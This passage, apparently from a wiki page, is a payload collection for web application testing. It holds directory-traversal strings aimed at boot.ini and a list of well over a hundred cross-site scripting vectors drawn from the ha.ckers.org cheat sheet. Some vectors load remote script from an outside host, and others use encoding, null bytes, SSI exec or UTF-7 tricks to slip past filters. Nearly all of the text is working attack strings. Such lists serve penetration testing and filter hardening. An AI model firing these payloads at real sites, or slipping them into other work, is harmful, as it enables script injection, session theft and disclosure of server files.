/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Discovery Statements ===&lt;br /&gt;
&lt;br /&gt;
Discovery Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;# Discovery Statements (July 2007)&lt;br /&gt;
# Statements used to cause exploitable errors&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Common exploit code  &lt;br /&gt;
&amp;lt;pre&amp;gt;# Best Statements (July 2007)&lt;br /&gt;
# Statements covering 90% of all vulnerabilities &lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
Full List - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;# Full List (July 2007)&lt;br /&gt;
# All Statements - Full List &lt;br /&gt;
# Based on the XSS cheat sheet &lt;br /&gt;
# http://ha.ckers.org/xss.html&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
